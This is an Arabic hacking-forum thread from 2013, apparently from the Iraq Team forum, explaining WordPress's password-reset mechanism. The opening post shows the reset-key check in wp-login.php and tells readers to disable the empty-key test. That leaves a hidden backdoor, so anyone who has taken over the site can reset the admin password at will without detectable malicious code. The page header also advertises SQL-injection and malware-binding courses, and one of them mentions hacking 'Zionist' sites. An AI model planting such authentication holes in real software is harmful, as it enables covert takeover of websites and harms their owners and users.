1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] Wordpress - Administrator Kit

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Hacker-DZ, بتاريخ ‏24 ابريل 2013.

كاتب الموضوع : Hacker-DZ المشاهدات : 1,532 الردود : 7 ‏24 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Hacker-DZ
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    Wordpress - Administrator Kit



    السلام عليكم ورحمة الله وبركـاته :{1}:

    كيف احوالكم ؟ i:q2^:

    اليوم موضوعنا عن الورد بريس وفكرة العودة بصلاحية ادمن بدون اكواد خبيثة وتنكشف :{13}:

    الورد بريس ببساطة سكربت تدوين ,,, ويعتمد على نظام الادارة WP-ADMIN

    من خلال يوزر نيم وباسورد

    لكن لو نسينا الباسورد ؟؟ شو الحل *:"

    الحل بالشكل التقليدي هو استعادة كلمة المرور ...

    السوال القوي ~ وما هي ألية استعادة البـاسورد ؟؟

    الالية بسيطة هنالك في جدول اليوزرات عمود اسمه

    user_activation_key

    هذا العمود لازم تكون فيه قيمة عشوائية تضعها الورد بريس

    اذا فيه قيمة = هنالك احد طلب استعادة لكلمة المرور

    اذا مافيه قيمة = لم يطلب احد الاستعادة

    طيب رائع ,, بعد الحصول على تلك القيمة او الـ Key راح نروح نضعه في الورد بريس

    بهذا الرابط

    كود PHP:
    Wordpress/wp-login.php?key=XXXXX&login=admin
    وزي ما بنلاحظ في هنالك Parameter اخر هو Login والذي يحدد الـيوزر نيم المراد تغيير كلمة مروره

    طيب نحن قلنا فوق انو لو ما في قيمة داخل user_activation_key

    يعني ما أحد طلب استعادة ,, ماذا لو خلينا الـ Key فارغ*:" في الرابط

    خلينا نشوف التجربة مع بعض

    كود PHP:
    mysqlshow tables;
    +-----------------------+
    Tables_in_wp          |
    +-----------------------+
    wp_commentmeta        
    wp_comments           
    wp_links              
    wp_options            
    wp_postmeta           
    wp_posts              
    wp_term_relationships 
    wp_term_taxonomy      
    wp_terms              
    wp_usermeta           
    wp_users              
    +-----------------------+
    11 rows in set (0.00 sec)


    mysqlselect from wp_users;
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    ID user_login user_pass                          user_nicename |  user_email                user_url user_registered     |  user_activation_key user_status display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    |  
    admin      XXXXX. | admin         the.dead.man-@hotmail.com |          | 2013-02-09 19:15:59 |                     |           admin        
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    1 row in set (0.00 sec)

    mysqlselect user_activation_key  from wp_users;
    +---------------------+
    user_activation_key |
    +---------------------+
    |                     | 
    +---------------------+
    1 row in set (0.00 sec)

    mysql>
    طبعا هاي الـ Query'z تظهر ان قيمة الـ Key فارغة

    الان نروح نطلب استعادة لكلمة المرور

    [​IMG]

    نلاحظ قيمة الـ Key

    كود PHP:
    mysqlselect user_activation_key  from wp_users;
    +----------------------+
    user_activation_key  |
    +----------------------+
    Y8uF04mZiaCZob8UCMy5 
    +----------------------+
    1 row in set (0.00 sec)
    الان هنروح للرابط

    كود PHP:
    http://iq-team.org/Wordpress/wp-login.php?key=Y8uF04mZiaCZob8UCMy5&login=admin
    [​IMG]


    وهتدخل كلمة مرور وهيمشي طبيعي جدا *:"

    الان لو رجعنا لـ wp-login.php

    كود PHP:
    function check_password_reset_key($key$login) {
        global 
    $wpdb;

        
    $key preg_replace('/[^a-z0-9]/i'''$key);

        if ( empty( 
    $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        if ( empty(
    $login) || !is_string($login) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        
    $user $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s AND user_login = %s"$key$login));

        if ( empty( 
    $user ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        return 
    $user;
    }
    المشكلة في الكود تبع الـ Empty

    كود PHP:
    if ( empty( $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));
    نضيف قبلهم // للسطرين علشان نقدر نغير كلمة المرور في أي وقت بشرط ان لا تقوم بطلبها من نموذج الاستعادة علشان ما يكون في قيمة داخل Key

    [​IMG]
    &:":&:":&:":
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    3mran
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    رد: Wordpress - Administrator Kit

    بارك الله فيك ..~


    واصل من دون فواصل ..~
     


  4. غير متصل

    .ılı.Iяẫqi.ılı.
    DeveloPer Plus

    عضو منذ:
    ‏22 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress - Administrator Kit

    السلام عليكم
    موضوع مميز
    بارك الله فيك
     


  5. غير متصل

    9max99
    rank
    Developer

    عضو منذ:
    ‏10 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: Wordpress - Administrator Kit

    السلام عليكم ورحمة الله وبركاته
    .................................................. ....
    بارك الله فيك اخي على الجهد والموضوع الرائع &:":​
     


  6. غير متصل

    ADNAN
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress - Administrator Kit

    سلمت يُمناك استاذنا ..​
     


  7. غير متصل

    تــــركــــي
    DeveloPer Plus

    عضو منذ:
    ‏25 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: Wordpress - Administrator Kit

    عليكم السلام
    مشكور حبي شرح رائع
    موفق حبيبي &:":​
     


  8. غير متصل

    صانع السلالم
    rank
    DeveloPer Plus

    عضو منذ:
    ‏1 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress - Administrator Kit

    بارك الله فيك
    تم التقييم
    تقبل مروري
    بالتوفيق
    :{1}:​
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...